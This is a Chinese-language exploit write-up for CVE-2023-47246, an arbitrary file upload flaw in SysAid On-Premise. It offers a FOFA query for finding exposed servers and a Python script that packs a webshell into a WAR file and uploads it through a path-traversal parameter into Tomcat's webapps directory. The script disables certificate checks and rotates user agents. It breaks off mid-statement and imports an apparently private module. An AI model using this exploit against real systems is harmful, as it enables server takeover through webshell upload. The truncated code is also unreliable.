0x00 概述
SysAid On-Premise是一种 IT 服务管理(ITSM)和 IT 资产管理(ITAM)解决方案,专为企业提供全面的、集成的 IT 管理服务。经过分析发现,该软件存在任意文件上传漏洞,攻击者可以通过上传webshell获取目标系统权限。
字段 | 值 | 备注 |
---|---|---|
漏洞编号 | CVE-2023-47246 | |
漏洞厂商 | SysAid | |
厂商官网 | https://www.sysaid.com/ | |
影响对象类型 | Web应用 | |
影响产品 | SysAid On-Premise | |
影响版本 | version < 23.3.36 | |
0x01 漏洞影响
漏洞影响版本:version < 23.3.36
0x02 漏洞环境
-
fofa query
body="sysaid-logo-dark-green.png"
0x03 漏洞验证和利用
exp :
import argparse
import binascii
import random
import time
import zipfile
import zlib
import urllib3
import requests
urllib3.disable_warnings()
def compressFile(shellFile, warFile):
try:
with zipfile.ZipFile(warFile, 'w', zipfile.ZIP_DEFLATED) as zipf:
zipf.write(shellFile)
zipf.close()
return True
except:
return False
def getHexData(warFile):
with open(warFile, 'rb') as warfile:
data = warfile.read()
warfile.close()
compressed_data = zlib.compress(data)
hex_data = binascii.hexlify(compressed_data).decode()
return hex_data
def generateRandomDirectoryName(num):
charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
return ''.join(random.choice(charset) for _ in range(num))
def get_random_agent():
agent_list = [
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'
]
return agent_list[random.randint(0, len(agent_list) - 1)]
def shellUpload(url, proxy, directoryName, shellFile):
userEntryUrl = f"{url}/userentry?accountId=/../../../tomcat/webapps/{directoryName}/&symbolName=test&base64UserName=YWRtaW4="
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": get_random_agent()
}
shellFileName = shellFile.split(".")[0]
warFile = f"{shellFileName}.war"
if compressFile(shellFile, warFile):
shellHex = getHexData(warFile=warFile)
data = binascii.unhexlify(shellHex)
from myframework.encoder import base64_encode
print(base64_encode(data=data))
resp = requests.post(url=userEntryUrl, headers=headers, data=data, proxies=proxy, verify=False)
print("
评论